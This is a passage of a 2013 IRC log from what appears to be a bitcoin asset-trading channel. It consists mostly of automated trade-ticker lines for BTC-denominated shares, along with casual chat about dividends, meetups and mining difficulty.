0.02545 BTC [+] Jun 13 03:26:38 [HAVELOCK] [ASICM] 151 @ 0.02500002 = 3.775 BTC [-] Jun 13 03:28:56 [HAVELOCK] [ASICM] 51 @ 0.02500003 = 1.275 BTC [+] Jun 13 03:29:29 [HAVELOCK] [ASICM] 2 @ 0.02500003 = 0.05 BTC [+] Jun 13 03:30:35 [BTCTC] [ASICMINER-PT] 1 @ 2.519 BTC [+] Jun 13 03:36:48 [MPEX] [S.MPOE] 8100 @ 0.00072504 = 5.8728 BTC [-] Jun 13 03:37:03 [BTCTC] [TAT.ASICMINER] 13 @ 0.025449 = 0.3308 BTC [-] Jun 13 03:37:03 [MPEX] [S.MPOE] 4321 @ 0.00072119 = 3.1163 BTC [-] Jun 13 03:37:05 [MPEX] [S.MPOE] 12400 @ 0.00072118 = 8.9426 BTC [-] Jun 13 03:37:32 [HAVELOCK] [ASICM] 40 @ 0.02500003 = 1 BTC [+] Jun 13 03:40:20 [BTCTC] [ASICMINER-PT] 2 @ 2.519 = 5.038 BTC [+] Jun 13 03:41:42 [HAVELOCK] [ASICM] 5 @ 0.02500003 = 0.125 BTC [+] Jun 13 03:41:45 [BTCTC] [S.DICE-PT] 14 @ 0.002888 = 0.0404 BTC [-] Jun 13 03:42:39 [BTCTC] [S.DICE-PT] 14 @ 0.002899 = 0.0406 BTC [+] Jun 13 03:43:30 [BTCTC] [ASICMINER-PT] 1 @ 2.52 BTC [+] Jun 13 03:43:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.02545 = 0.0764 BTC [+] Jun 13 03:45:10 [HAVELOCK] [ASICM] 4 @ 0.02509999 = 0.1004 BTC [+] Jun 13 03:45:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.02545 = 0.2036 BTC [+] Jun 13 03:47:31 [BTCTC] [ASICMINER-PT] 1 @ 2.519 BTC [-] Jun 13 03:51:35 [BTCTC] [TAT.VIRTUALMINE] 89 @ 0.00738 = 0.6568 BTC [+] Jun 13 03:51:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.02545 = 0.0509 BTC [+] Jun 13 03:52:27 [BTCTC] [TAT.VIRTUALMINE] 101 @ 0.00738 = 0.7454 BTC [+] Jun 13 03:53:10 [HAVELOCK] [ASICM] 4 @ 0.02509999 = 0.1004 BTC [+] Jun 13 03:53:58 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 03:55:50 [HAVELOCK] [ASICM] 3 @ 0.02500003 = 0.075 BTC [-] Jun 13 03:56:50 [HAVELOCK] [ASICM] 45 @ 0.02500002 = 1.125 BTC [-] Jun 13 03:57:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.02545 = 0.0509 BTC [+] Jun 13 03:58:12 [BTCTC] [COGNITIVE] 1 @ 0.299999 BTC [+] Jun 13 03:58:36 [HAVELOCK] [ASICM] 4 @ 0.02509999 = 0.1004 BTC [+] Jun 13 03:59:40 [HAVELOCK] [ASICM] 12 @ 0.02509999 = 0.3012 BTC [+] Jun 13 04:01:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.0255 = 0.255 BTC [+] Jun 13 04:02:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.0255 = 0.153 BTC [+] Jun 13 04:04:03 [HAVELOCK] [ASICM] 4 @ 0.02509999 = 0.1004 BTC [+] Jun 13 04:07:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.02545 = 0.1527 BTC [-] Jun 13 04:07:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.02545 = 0.0764 BTC [-] Jun 13 04:10:08 [HAVELOCK] [HIM] 14 @ 0.2801 = 3.9214 BTC [-] Jun 13 04:11:15 [HAVELOCK] [ASICM] 155 @ 0.02509999 = 3.8905 BTC [+] Jun 13 04:11:55 ;;next Jun 13 04:11:57 expecting re-test of 88 | lower targets: 80, 67-72 | resistance: 110 | support: 100, 96-97 | #bitcoin [Mon, 10 Jun 2013 04:15:07 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 2 days, 20 hours, 56 minutes, and 47 seconds ago Jun 13 04:14:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.02549 BTC [+] Jun 13 04:14:20 [BTCTC] [BTC-BOND] 79 @ 0.009994 = 0.7895 BTC [+] Jun 13 04:14:33 [BTCTC] [GSDPT] 99 @ 0.00251 = 0.2485 BTC [+] Jun 13 04:15:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.02549 BTC [+] Jun 13 04:17:27 [BTCTC] [LTC-MINING] 1 @ 0.335 BTC [+] Jun 13 04:18:24 [BTCTC] [GSDPT] 5 @ 0.0025 = 0.0125 BTC [-] Jun 13 04:18:27 [BTCTC] [GSDPT] 1 @ 0.0024 BTC [-] Jun 13 04:18:30 [BTCTC] [GSDPT] 1 @ 0.0024 BTC [-] Jun 13 04:18:32 [BTCTC] [GSDPT] 150 @ 0.0022 = 0.33 BTC [-] Jun 13 04:18:33 [BTCTC] [GSDPT] 10 @ 0.002177 = 0.0218 BTC [-] Jun 13 04:18:37 [BTCTC] [GSDPT] 161 @ 0.002115 = 0.3405 BTC [-] Jun 13 04:18:39 [BTCTC] [GSDPT] 672 @ 0.0021 = 1.4112 BTC [-] Jun 13 04:19:41 [BTCTC] [S.DICE-PT] 20 @ 0.002551 = 0.051 BTC [-] Jun 13 04:19:43 [BTCTC] [S.DICE-PT] 10 @ 0.00255 = 0.0255 BTC [-] Jun 13 04:19:46 [BTCTC] [S.DICE-PT] 12 @ 0.00255 = 0.0306 BTC [-] Jun 13 04:19:49 [BTCTC] [S.DICE-PT] 5 @ 0.00252 = 0.0126 BTC [-] Jun 13 04:19:51 [BTCTC] [S.DICE-PT] 10 @ 0.00251 = 0.0251 BTC [-] Jun 13 04:19:53 [BTCTC] [S.DICE-PT] 5 @ 0.0025 = 0.0125 BTC [-] Jun 13 04:19:54 [BTCTC] [S.DICE-PT] 15 @ 0.0025 = 0.0375 BTC [-] Jun 13 04:19:56 [BTCTC] [S.DICE-PT] 50 @ 0.00245 = 0.1225 BTC [-] Jun 13 04:19:58 [BTCTC] [S.DICE-PT] 5 @ 0.002421 = 0.0121 BTC [-] Jun 13 04:20:00 [BTCTC] [S.DICE-PT] 20 @ 0.002421 = 0.0484 BTC [-] Jun 13 04:20:02 [BTCTC] [S.DICE-PT] 50 @ 0.00242 = 0.121 BTC [-] Jun 13 04:20:04 [BTCTC] [S.DICE-PT] 97 @ 0.002415 = 0.2343 BTC [-] Jun 13 04:20:07 [BTCTC] [S.DICE-PT] 100 @ 0.002409 = 0.2409 BTC [-] Jun 13 04:20:11 [BTCTC] [S.DICE-PT] 87 @ 0.002402 = 0.209 BTC [-] Jun 13 04:21:08 mircea_popescu: Hey, one of those was me Jun 13 04:22:14 ;;bc,stats Jun 13 04:22:15 Current Blocks: 241226 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 693 blocks | Next Difficulty In About: 3 days, 9 hours, 31 minutes, and 45 seconds | Next Difficulty Estimate: 19235389.268 | Estimated Percent Change: 23.25927 Jun 13 04:22:30 Gwibble next diff still not good Jun 13 04:22:56 looking like 21m to me, with lots of miner pain Jun 13 04:23:43 [HAVELOCK] [ASICM] 3 @ 0.02509999 = 0.0753 BTC [+] Jun 13 04:25:02 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 04:25:46 [BTCTC] [TAT.ASICMINER] 13 @ 0.02549 = 0.3314 BTC [+] Jun 13 04:26:14 "From a new user: I tried to create a fixed-weight bet on USD/BTC and it was rejected. Is fixed-weight not a good idea?" Huh? Jun 13 04:28:26 jurov: "Status: Expires July 17th, 2003" You might want to fix that Jun 13 04:28:44 [BTCTC] [ASICMINER-PT] 1 @ 2.519 BTC [-] Jun 13 04:34:13 [BTCTC] [DMS.MINING] 10 @ 0.030498 = 0.305 BTC [-] Jun 13 04:36:04 [MPEX] [S.MPOE] 8313 @ 0.00071879 = 5.9753 BTC [-] Jun 13 04:36:06 [MPEX] [S.MPOE] 2087 @ 0.00071642 = 1.4952 BTC [-] Jun 13 04:44:32 [BTCTC] [DMS.MINING] 1 @ 0.030496 BTC [-] Jun 13 04:45:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.02549 BTC [+] Jun 13 04:45:49 [BTCTC] [TAT.ASICMINER] 9 @ 0.02549 = 0.2294 BTC [+] Jun 13 04:53:09 [BTCTC] [ASICMINER-PT] 1 @ 1.45 BTC [-] Jun 13 04:53:42 [MPEX] [S.MPOE] 4050 @ 0.00072034 = 2.9174 BTC [+] Jun 13 04:53:47 ;;ticker Jun 13 04:53:48 BTCUSD ticker | Best bid: 109.59756, Best ask: 109.59853, Bid-ask spread: 0.00097, Last trade: 109.59756, 24 hour volume: 16939.37173164, 24 hour low: 107.01125, 24 hour high: 112.25000, 24 hour vwap: 109.37679 Jun 13 04:56:07 [BTCTC] [ASICMINER-PT] 2 @ 2.519 = 5.038 BTC [+] Jun 13 04:58:36 [HAVELOCK] [ASICM] 581 @ 0.02500004 = 14.525 BTC [-] Jun 13 04:59:20 [BTCTC] [ASICMINER-PT] 1 @ 2.508 BTC [-] Jun 13 05:02:34 [BTCTC] [TAT.ASICMINER] 65 @ 0.02549 = 1.6569 BTC [+] Jun 13 05:05:48 [BTCTC] [BASIC-MINING] 1 @ 0.6899 BTC [+] Jun 13 05:17:40 [HAVELOCK] [ASICM] 200 @ 0.02509999 = 5.02 BTC [+] Jun 13 05:19:40 [MPEX] [S.MPOE] 2240 @ 0.00071642 = 1.6048 BTC [-] Jun 13 05:23:35 [BTCTC] [TAT.ASICMINER] 8 @ 0.02548 = 0.2038 BTC [-] Jun 13 05:24:21 [HAVELOCK] [ASICM] 405 @ 0.02509999 = 10.1655 BTC [+] Jun 13 05:25:02 [HAVELOCK] [ASICM] 48 @ 0.02509999 = 1.2048 BTC [+] Jun 13 05:25:18 [BTCTC] [ASICMINER-PT] 1 @ 2.519 BTC [+] Jun 13 05:25:43 [BTCTC] [ASICMINER-PT] 2 @ 2.519 = 5.038 BTC [+] Jun 13 05:26:07 [BTCTC] [ASICMINER-PT] 2 @ 2.519989 = 5.04 BTC [+] Jun 13 05:26:39 [BTCTC] [ASICMINER-PT] 1 @ 2.51999 BTC [+] Jun 13 05:27:18 [BTCTC] [ASICMINER-PT] 3 @ 2.519 = 7.557 BTC [-] Jun 13 05:27:22 [BTCTC] [ASICMINER-PT] 11 @ 2.52 = 27.72 BTC [+] Jun 13 05:28:56 [BTCTC] [LTC-MINING] 1 @ 0.379919 BTC [+] Jun 13 05:29:10 [HAVELOCK] [ASICM] 123 @ 0.02509999 = 3.0873 BTC [+] Jun 13 05:31:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.02549 = 0.0765 BTC [+] Jun 13 05:32:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00739 BTC [+] Jun 13 05:34:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.02549 BTC [+] Jun 13 05:35:20 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 05:37:59 [BTCTC] [DMS.MINING] 80 @ 0.029451 = 2.3561 BTC [-] Jun 13 05:38:01 [BTCTC] [ASICMINER-PT] 1 @ 2.519 BTC [-] Jun 13 05:38:02 [BTCTC] [DMS.MINING] 11 @ 0.02945 = 0.324 BTC [-] Jun 13 05:38:04 [BTCTC] [DMS.MINING] 10 @ 0.02945 = 0.2945 BTC [-] Jun 13 05:38:09 [BTCTC] [DMS.MINING] 25 @ 0.0294 = 0.735 BTC [-] Jun 13 05:39:09 [BTCTC] [TAT.ASICMINER] 28 @ 0.02549 = 0.7137 BTC [+] Jun 13 05:39:13 [BTCTC] [ASICMINER-PT] 1 @ 2.519 BTC [-] Jun 13 05:40:14 [BTCTC] [DMS.PURCHASE] 200 @ 0.066163 = 13.2326 BTC [-] Jun 13 05:40:26 [BTCTC] [ASICMINER-PT] 3 @ 2.52 = 7.56 BTC [+] Jun 13 05:41:40 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 05:41:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.02549 = 0.1529 BTC [+] Jun 13 05:42:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.02548 = 0.051 BTC [-] Jun 13 05:45:05 Results of our ASICMINER poll: https://bitcointalk.org/index.php?topic=99497.msg2458334#msg2458334 Jun 13 05:48:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02549 BTC [+] **** BEGIN LOGGING AT Thu Jun 13 15:37:04 2013 Jun 13 15:43:07 [BTCTC] [TAT.ASICMINER] 29 @ 0.0256 = 0.7424 BTC [+] Jun 13 15:44:52 [BTCTC] [DMS.PURCHASE] 1 @ 0.066163 BTC [-] Jun 13 15:46:03 [HAVELOCK] [SDICE] 25 @ 0.20060001 = 5.015 BTC [-] Jun 13 15:48:11 [BTCTC] [DMS.MINING] 1 @ 0.03098 BTC [-] Jun 13 15:49:20 mircea_popescu: https://bitcointalk.org/index.php?topic=224634.msg2462116#msg2462116 << my devil's advocacy Jun 13 15:49:41 hang on i'm speccing torture devices. Jun 13 15:50:17 [HAVELOCK] [ASICM] 26 @ 0.02649 = 0.6887 BTC [+] Jun 13 15:54:24 [BTCTC] [ASICMINER-PT] 1 @ 2.5967 BTC [+] Jun 13 15:56:35 wait, are you designing or are you just shopping for torture devices? also, why? Jun 13 15:56:56 coz they're fun Jun 13 15:59:00 "my BTC30 loss due to napkin accounting was more than recovered" snigger Jun 13 16:00:53 [HAVELOCK] [ASICM] 1 @ 0.0260001 BTC [-] Jun 13 16:00:54 [HAVELOCK] [ASICM] 237 @ 0.02600001 = 6.162 BTC [-] Jun 13 16:00:55 [HAVELOCK] [ASICM] 54 @ 0.026 = 1.404 BTC [-] Jun 13 16:00:56 [HAVELOCK] [ASICM] 8 @ 0.0255 = 0.204 BTC [-] Jun 13 16:01:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.025403 BTC [-] Jun 13 16:01:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.025403 = 0.1016 BTC [-] Jun 13 16:01:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.025403 = 0.0508 BTC [-] Jun 13 16:01:31 [BTCTC] [ASICMINER-PT] 1 @ 2.5967 BTC [+] Jun 13 16:01:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.025402 = 0.0508 BTC [-] Jun 13 16:02:37 [BTCTC] [ASICMINER-PT] 1 @ 2.597 BTC [+] Jun 13 16:03:17 [HAVELOCK] [ASICM] 1 @ 0.0264 BTC [+] Jun 13 16:03:39 [BTCTC] [ASICMINER-PT] 7 @ 2.599 = 18.193 BTC [+] Jun 13 16:04:38 designing. i'm too talented to buy. Jun 13 16:06:38 how much dividends is paid for ASICMINER-PT shares ? Jun 13 16:06:44 can I see that somewhere ? Jun 13 16:07:15 [BTCTC] [ASICMINER-PT] 1 @ 2.589 BTC [-] Jun 13 16:07:25 Check the dividends tab Jun 13 16:07:35 or History tab Jun 13 16:07:43 [BTCTC] [TAT.ASICMINER] 21 @ 0.0256 = 0.5376 BTC [+] Jun 13 16:07:45 [BTCTC] [TAT.ASICMINER] 89 @ 0.0256 = 2.2784 BTC [+] Jun 13 16:08:33 ThickAsThieves: can I see without actually owning any shares ? Jun 13 16:08:58 yes Jun 13 16:09:06 have you tried? Jun 13 16:09:10 yes :) Jun 13 16:09:32 https://btct.co/security/ASICMINER-PT Jun 13 16:09:35 click on history Jun 13 16:09:37 or Jun 13 16:09:47 https://www.havelockinvestments.com/fund.php?symbol=ASICM Jun 13 16:09:51 click on Dividends Jun 13 16:09:52 or Jun 13 16:10:06 https://bitfunder.com/asset/TAT.ASICMINER Jun 13 16:10:06 great, thanks! Jun 13 16:10:10 click on Dividends Jun 13 16:10:11 etc Jun 13 16:10:26 http://trilema.com/2013/the-twu-luv-torture/ < there. Jun 13 16:10:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.0256 = 0.128 BTC [+] Jun 13 16:12:13 [HAVELOCK] [ASICM] 3 @ 0.0264 = 0.0792 BTC [+] Jun 13 16:13:48 What did Superman do? Jun 13 16:13:55 ikr? Jun 13 16:13:55 [BTCTC] [DMS.MINING] 20 @ 0.03098 = 0.6196 BTC [-] Jun 13 16:13:55 I bet he sorte dit Jun 13 16:16:07 [HAVELOCK] [ASICM] 2 @ 0.0264 = 0.0528 BTC [+] Jun 13 16:17:34 i must know! Jun 13 16:20:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.0257 = 0.1542 BTC [+] Jun 13 16:22:29 lol Jun 13 16:23:27 [MPEX] [S.MPOE] 2926 @ 0.00071864 = 2.1027 BTC [+] Jun 13 16:24:10 best i can tell the situation only exists on the cover of that issue Jun 13 16:24:20 and superman is actually presented with a different proble Jun 13 16:24:23 m Jun 13 16:24:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0257 BTC [+] Jun 13 16:24:42 where superboy and kryptonite are seperately locked in metal coffins Jun 13 16:24:46 and he must choose Jun 13 16:25:04 superman then wakes up in the desert cuz it was all a dream Jun 13 16:25:08 [BTCTC] [TAT.ASICMINER] 8 @ 0.0257 = 0.2056 BTC [+] Jun 13 16:25:09 meh Jun 13 16:25:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0257 BTC [+] Jun 13 16:25:50 [HAVELOCK] [HIM] 15 @ 0.287 = 4.305 BTC [-] Jun 13 16:26:51 [HAVELOCK] [ASICM] 84 @ 0.0256 = 2.1504 BTC [-] Jun 13 16:28:33 [HAVELOCK] [ASICM] 40 @ 0.0255 = 1.02 BTC [-] Jun 13 16:28:57 meh indeed. Jun 13 16:29:11 lol mircea_popescu stop hatin' Jun 13 16:29:19 never. Jun 13 16:30:49 i challenge you to street fighter Jun 13 16:31:41 [BTCTC] [ASICMINER-PT] 1 @ 2.5988 BTC [+] Jun 13 16:32:36 [BTCTC] [ASICMINER-PT] 1 @ 2.5989 BTC [+] Jun 13 16:33:06 [BTCTC] [ASICMINER-PT] 3 @ 2.599 = 7.797 BTC [+] Jun 13 16:34:36 [BTCTC] [TAT.ASICMINER] 389 @ 0.0257 = 9.9973 BTC [+] Jun 13 16:34:40 [BTCTC] [TAT.ASICMINER] 6 @ 0.0257 = 0.1542 BTC [+] Jun 13 16:34:44 [BTCTC] [TAT.ASICMINER] 50 @ 0.0257 = 1.285 BTC [+] Jun 13 16:35:07 [BTCTC] [DMS.MINING] 4 @ 0.03098 = 0.1239 BTC [-] Jun 13 16:36:41 [BTCTC] [DMS.MINING] 16 @ 0.030993 = 0.4959 BTC [+] Jun 13 16:37:19 [BTCTC] [TAT.ASICMINER] 30 @ 0.02578 = 0.7734 BTC [+] Jun 13 16:37:54 [BTCTC] [TAT.ASICMINER] 67 @ 0.02578 = 1.7273 BTC [+] Jun 13 16:38:04 [BTCTC] [DMS.SELLING] 10 @ 0.0369 = 0.369 BTC [+] Jun 13 16:39:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.02581 = 0.2581 BTC [+] Jun 13 16:39:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.02595 = 0.1298 BTC [+] Jun 13 16:40:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.026 BTC [+] Jun 13 16:40:31 [BTCTC] [TAT.ASICMINER] 6 @ 0.026 = 0.156 BTC [+] Jun 13 16:41:20 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [+] Jun 13 16:42:51 [BTCTC] [TAT.ASICMINER] 137 @ 0.026 = 3.562 BTC [+] Jun 13 16:48:43 [HAVELOCK] [VTX] 1 @ 0.461 BTC [-] Jun 13 16:53:21 [BTCTC] [DMS.MINING] 1 @ 0.030993 BTC [+] Jun 13 16:54:23 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [+] Jun 13 16:55:10 [HAVELOCK] [ASICM] 1 @ 0.0261999 BTC [+] Jun 13 16:55:28 [HAVELOCK] [ASICM] 50 @ 0.0262 = 1.31 BTC [+] Jun 13 16:55:34 [HAVELOCK] [ASICM] 20 @ 0.0262999 = 0.526 BTC [+] Jun 13 16:55:45 [HAVELOCK] [ASICM] 132 @ 0.0261 = 3.4452 BTC [-] Jun 13 16:57:08 https://bitcointalk.org/index.php?topic=101902.msg2458656#msg2458656 Jun 13 16:57:17 My last few posts were unprofessional. I apologize for the tone. Having a bad day dealing with government bureaucracy =/ Jun 13 16:57:25 [HAVELOCK] [ASICM] 347 @ 0.02638 = 9.1539 BTC [+] Jun 13 17:02:18 Erik, never misses a chances to inject doubt into SDICE Jun 13 17:02:36 chance* Jun 13 17:04:57 hello everyone Jun 13 17:05:09 heya Jun 13 17:05:20 hai Jun 13 17:05:36 so what's up in assetland? Jun 13 17:05:37 hi all Jun 13 17:05:50 hello mr old school exchange style Jun 13 17:05:53 LA launch went well...27 people there Jun 13 17:05:57 nice. Jun 13 17:05:59 hehehe Jun 13 17:06:05 we did bi coastal exchange Jun 13 17:06:09 really just a token Jun 13 17:06:09 congrats Jun 13 17:06:20 but hopefully berlin is coming up by the end of the month Jun 13 17:06:42 and now seoul seems to want to do this too Jun 13 17:06:45 enjoy your dividends this month. Jun 13 17:06:46 did you do some cross-coast exchanges (not sure how that'd even work) Jun 13 17:06:51 we sure did Jun 13 17:06:53 that was fun read Jun 13 17:06:58 cross coastal Jun 13 17:06:59 jcpham: wasn't it :-) Jun 13 17:07:08 twas tewas Jun 13 17:07:14 it involved trust and small amounts of money and bitcoin Jun 13 17:07:22 but hopefully our own "WoT" is growing Jun 13 17:07:36 and i would like to have an equivalent rating to the IRC WoT Jun 13 17:07:49 mjr_: why not reuse ? Jun 13 17:08:06 i could...and maybe will...but that means a new level of coding complexity Jun 13 17:08:21 so maybe i will allow people to use their WoT rating on the site Jun 13 17:08:27 but also have the option to just have a local one Jun 13 17:08:50 basically, i would have to have them go through the WoT process...which does not lend itself to being done on a phone Jun 13 17:09:17 but slowly but surely Jun 13 17:09:27 also satoshi square is going to be on Russia Today Jun 13 17:10:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.026499 = 0.0795 BTC [+] Jun 13 17:10:57 mjr_: cool! Jun 13 17:11:49 mjr_ srsly, reuse. Jun 13 17:12:17 yes...we are going to use it Jun 13 17:12:28 but i don't think it can be used alone, and i don't see the point for people who have never been on OTC Jun 13 17:12:33 or IRC for that matter Jun 13 17:13:29 mircea_popescu: the SD chart looks weird, on the frontpage the last candle is green, and on the SD asset details page it's red Jun 13 17:14:17 first page shows averages Jun 13 17:14:49 and it always defaults to green if no prev value Jun 13 17:15:29 (gotta default to something) Jun 13 17:16:43 You know those charts without any indication of scale ? That's not how charts work. Jun 13 17:16:51 :D Jun 13 17:16:52 :D Jun 13 17:19:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.026499 BTC [+] Jun 13 17:21:40 [BTCTC] [ASICMINER-PT] 1 @ 2.5999 BTC [+] Jun 13 17:22:46 [BTCTC] [ASICMINER-PT] 5 @ 2.6 = 13 BTC [+] Jun 13 17:22:53 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] Jun 13 17:23:14 [BTCTC] [ASICMINER-PT] 4 @ 2.6 = 10.4 BTC [+] Jun 13 17:23:16 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] Jun 13 17:24:18 http://arstechnica.com/information-technology/2013/06/comcast-turns-your-xfinity-modem-into-public-wi-fi-hotspot/ Jun 13 17:24:44 [BTCTC] [ASICMINER-PT] 4 @ 2.61 = 10.44 BTC [+] Jun 13 17:24:52 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [+] Jun 13 17:24:55 [BTCTC] [ASICMINER-PT] 5 @ 2.625 = 13.125 BTC [+] Jun 13 17:24:59 [BTCTC] [ASICMINER-PT] 4 @ 2.625 = 10.5 BTC [+] Jun 13 17:25:08 As usual, it's hip to be square - http://www.bloomberg.com/news/2013-06-12/time-warner-cable-content-incentives-thwart-new-web-tv.html Jun 13 17:25:33 "Time Warner Cable defended Britt's statements on Wednesday, telling Variety that "the amount and scope of exclusivity and windowing in Time Warner Cable’s arrangements with programmers pales by comparison to that found between other players in the entertainment ecosystem." " Jun 13 17:26:31 [BTCTC] [TAT.ASICMINER] 6 @ 0.026499 = 0.159 BTC [+] Jun 13 17:28:05 [BTCTC] [TAT.ASICMINER] 4 @ 0.0265 = 0.106 BTC [+] Jun 13 17:29:21 [BTCTC] [ASICMINER-PT] 3 @ 2.623 = 7.869 BTC [-] Jun 13 17:34:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.0265 = 0.053 BTC [+] Jun 13 17:34:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.0265 = 0.265 BTC [+] Jun 13 17:34:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.0265 = 0.053 BTC [+] Jun 13 17:38:33 [BTCTC] [DMS.MINING] 5 @ 0.03 = 0.15 BTC [-] Jun 13 17:38:39 [BTCTC] [ASICMINER-PT] 3 @ 2.623 = 7.869 BTC [-] Jun 13 17:38:41 [BTCTC] [DMS.MINING] 1 @ 0.03 BTC [-] Jun 13 17:38:43 [BTCTC] [DMS.MINING] 1 @ 0.03 BTC [-] Jun 13 17:38:45 [BTCTC] [DMS.MINING] 10 @ 0.02991 = 0.2991 BTC [-] Jun 13 17:39:05 [HAVELOCK] [ASICM] 48 @ 0.026299 = 1.2624 BTC [-] Jun 13 17:39:07 [HAVELOCK] [ASICM] 40 @ 0.0263 = 1.052 BTC [+] Jun 13 17:39:08 [HAVELOCK] [ASICM] 312 @ 0.02637999 = 8.2306 BTC [+] Jun 13 17:39:37 [HAVELOCK] [ASICM] 27 @ 0.02637999 = 0.7123 BTC [+] Jun 13 17:40:32 [BTCTC] [ASICMINER-PT] 1 @ 2.624 BTC [+] Jun 13 17:40:36 [BTCTC] [ASICMINER-PT] 5 @ 2.625 = 13.125 BTC [+] Jun 13 17:42:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.0265 = 0.106 BTC [+] Jun 13 17:48:18 [BTCTC] [TAT.ASICMINER] 50 @ 0.0265 = 1.325 BTC [+] Jun 13 17:49:05 [BTCTC] [TAT.ASICMINER] 12 @ 0.0265 = 0.318 BTC [+] Jun 13 17:49:15 [BTCTC] [ASICMINER-PT] 1 @ 2.622 BTC [-] Jun 13 17:50:09 [BTCTC] [ASICMINER-PT] 2 @ 2.623 = 5.246 BTC [+] Jun 13 17:51:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.0265 = 0.0795 BTC [+] Jun 13 18:01:20 [BTCTC] [BASIC-MINING] 4 @ 0.66 = 2.64 BTC [-] Jun 13 18:01:27 [BTCTC] [ASICMINER-PT] 1 @ 2.6239 BTC [+] Jun 13 18:01:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0265 BTC [+] Jun 13 18:02:16 [BTCTC] [DMS.SELLING] 8 @ 0.0369 = 0.2952 BTC [+] Jun 13 18:02:21 [BTCTC] [DMS.SELLING] 10 @ 0.036999 = 0.37 BTC [+] Jun 13 18:03:08 [BTCTC] [ASICMINER-PT] 1 @ 2.624 BTC [+] Jun 13 18:04:40 [BTCTC] [ASICMINER-PT] 1 @ 2.624 BTC [+] Jun 13 18:05:16 [BTCTC] [TAT.ASICMINER] 20 @ 0.026003 = 0.5201 BTC [-] Jun 13 18:06:02 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.0072 = 0.0504 BTC [+] Jun 13 18:06:30 [BTCTC] [ASICMINER-PT] 1 @ 2.624 BTC [+] Jun 13 18:07:06 [BTCTC] [TAT.VIRTUALMINE] 45 @ 0.00729 = 0.3281 BTC [+] Jun 13 18:07:34 [BTCTC] [S.DICE-PT] 6 @ 0.002697 = 0.0162 BTC [-] Jun 13 18:07:56 [BTCTC] [TAT.ASICMINER] 18 @ 0.026003 = 0.4681 BTC [-] Jun 13 18:09:04 [BTCTC] [S.DICE-PT] 5 @ 0.002698 = 0.0135 BTC [+] Jun 13 18:09:13 [BTCTC] [S.DICE-PT] 20 @ 0.0027 = 0.054 BTC [+] Jun 13 18:09:17 [BTCTC] [ASICMINER-PT] 1 @ 2.624 BTC [+] Jun 13 18:09:19 [BTCTC] [S.DICE-PT] 69 @ 0.00275 = 0.1898 BTC [+] Jun 13 18:09:25 [BTCTC] [S.DICE-PT] 10 @ 0.00275 = 0.0275 BTC [+] Jun 13 18:09:26 [BTCTC] [S.DICE-PT] 50 @ 0.0028 = 0.14 BTC [+] Jun 13 18:09:28 [BTCTC] [S.DICE-PT] 10 @ 0.00285 = 0.0285 BTC [+] Jun 13 18:09:28 [BTCTC] [S.DICE-PT] 100 @ 0.002898 = 0.2898 BTC [+] Jun 13 18:09:41 [BTCTC] [S.DICE-PT] 695 @ 0.002899 = 2.0148 BTC [+] Jun 13 18:10:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.0263 = 0.263 BTC [+] Jun 13 18:13:24 [HAVELOCK] [ASICM] 22 @ 0.0263 = 0.5786 BTC [-] Jun 13 18:15:27 [BTCTC] [ASICMINER-PT] 1 @ 2.624 BTC [+] Jun 13 18:15:57 [BTCTC] [DMS.MINING] 1 @ 0.030993 BTC [+] Jun 13 18:16:45 [MPEX] [S.MPOE] 11738 @ 0.00071864 = 8.4354 BTC [+] Jun 13 18:18:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.0263 = 0.1315 BTC [+] Jun 13 18:19:24 [BTCTC] [TAT.ASICMINER] 38 @ 0.0263 = 0.9994 BTC [+] Jun 13 18:19:32 [BTCTC] [DMS.MINING] 5 @ 0.03098 = 0.1549 BTC [-] Jun 13 18:20:13 [BTCTC] [ASICMINER-PT] 2 @ 2.624 = 5.248 BTC [+] Jun 13 